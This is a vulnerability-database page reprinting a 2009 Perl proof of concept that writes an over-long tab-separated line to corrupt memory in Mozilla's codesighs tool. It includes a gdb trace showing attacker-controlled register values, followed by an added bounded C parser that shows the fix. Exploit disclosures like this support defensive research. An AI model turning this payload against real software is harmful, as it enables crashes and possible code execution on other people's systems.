Mozilla Codesighs Memory Corruption PoC

12 Dec 2009 | Reported by Jeremy Brown | Type: zdt | Source: 0day.today

Mozilla Codesighs Memory Corruption PoC by Jeremy Brown, published on 2009-12-12. The exploit creates a file with a specific payload, causing a memory corruption vulnerability in Mozilla

Code
=======================================
Mozilla Codesighs Memory Corruption PoC
=======================================


# Title: Mozilla Codesighs Memory Corruption PoC
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremy Brown
# Published: 2009-12-12
# Verified: yes

#!/usr/bin/perl
# thedailyshow.pl
# AKA
# Mozilla Codesighs Memory Corruption PoC
#
#
# *********************************************************************************************************
#
# 257       while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
# (gdb)
# 259           trimWhite(lineBuffer);
# (gdb)
# trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 145 times>...) at codesighs.c:213
# 213       int len = strlen(inString);
# (gdb)
# 215       while(len)
# (gdb)
# 217           len--;
# (gdb)
# 219           if(isspace(*(inString + len)))
# (gdb)
# 221               *(inString + len) = '\0';
# (gdb)
# 215       while(len)
# (gdb)
# 217           len--;
# (gdb)
# 219           if(isspace(*(inString + len)))
# (gdb)
# 228   }
# (gdb)
# codesighs (inOptions=0xbffff350) at codesighs.c:261
# 261           scanRes = sscanf(lineBuffer,
# (gdb) i r
# eax            0x0    0
# ecx            0xb7fe468c -1208072564
# edx            0x82   130
# ebx            0x9d8ff4   10326004
# esp            0xbfffd040 0xbfffd040
# ebp            0xbffff328 0xbffff328
# esi            0x0    0
# edi            0x0    0
# eip            0x8048945  0x8048945 <codesighs+142>
# eflags         0x246  [ PF ZF IF ]
# cs             0x73   115
# ss             0x7b   123
# ds             0x7b   123
# es             0x7b   123
# fs             0x0    0
# gs             0x33   51
# (gdb) s
# 270           if(6 == scanRes)
# (gdb) i r
# eax            0x6    6
# ecx            0x414141   4276545
# edx            0x0    0
# ebx            0x9d8ff4   10326004
# esp            0xbfffd040 0xbfffd040
# ebp            0xbffff328 0xbffff328
# esi            0x0    0
# edi            0x0    0
# eip            0x804899d  0x804899d <codesighs+230>
# eflags         0x282  [ SF IF ]
# cs             0x73   115
# ss             0x7b   123
# ds             0x7b   123
# es             0x7b   123
# fs             0x0    0
# gs             0x33   51
# (gdb)
#
# http://jbrownsec.blogspot.com/2009/12/mozilla-code-sighs.html
#
# "Can't read my, can't read my, no she can't read my poker face"
#
# *********************************************************************************************************
# thedailyshow.pl
 
$filename = $ARGV[0];
 
if(!defined($filename))
{
 
     print "Usage: $0 <filename>\n";
     exit;
 
}
 
$payload = "1\tCODE\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 260 . "\t";
 
     open(FILE, ">", $filename) or die("\nError: Can't write to $filename");
     print FILE $payload;
     close(FILE);
 
     print "Wrote payload to \"$filename\"\n";
     exit;



#  0day.today [2018-01-08]  #
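
The gdb trace in the script header shows one line read with fgets being split by a single sscanf call into six fields (6 == scanRes), and the generated line ends in a 260-character field. As an added example (not code from the original page or from Mozilla), here is a bounded parser for a line of that tab-separated shape that rejects an over-long field instead of copying it. The struct, field names, buffer sizes and the hexadecimal size field are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Field names and sizes are assumptions for this example, not codesighs.c values. */
struct record {
    unsigned long size;
    char seg_class[16], scope[16], module[16], segment[16], object[256];
};

/* Copy one tab-delimited field; fail rather than truncate or overflow. */
static int take_field(const char **cur, char *dst, size_t cap)
{
    size_t len = strcspn(*cur, "\t");
    if (len == 0 || len >= cap)          /* empty, or no room for the NUL */
        return -1;
    memcpy(dst, *cur, len);
    dst[len] = '\0';
    *cur += len + ((*cur)[len] == '\t'); /* step past the delimiter if present */
    return 0;
}

/* Returns 0 on success, -1 if a field is missing, malformed or too long. */
int parse_record(const char *line, struct record *out)
{
    char num[17], *end;
    const char *p = line;
    memset(out, 0, sizeof(*out));
    if (take_field(&p, num, sizeof(num)) != 0)
        return -1;
    out->size = strtoul(num, &end, 16);  /* hex size is an assumption */
    if (*end != '\0')
        return -1;
    if (take_field(&p, out->seg_class, sizeof(out->seg_class)) ||
        take_field(&p, out->scope, sizeof(out->scope)) ||
        take_field(&p, out->module, sizeof(out->module)) ||
        take_field(&p, out->segment, sizeof(out->segment)) ||
        take_field(&p, out->object, sizeof(out->object)))
        return -1;
    return 0;
}

int main(void)
{
    struct record r;   /* the sample line below is constructed */
    int rc = parse_record("2a\tCODE\tpublic\tmod.o\t.text\tobj.o\tsym", &r);
    printf("rc=%d size=%lu object=%s\n", rc, r.size, r.object);
    return rc != 0;
}
```

Each field length is checked against its destination before any copy, so a line whose last field exceeds the assumed 255-character limit is refused rather than written past the buffer.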

Vulners AI Score: 6.8 (Medium risk)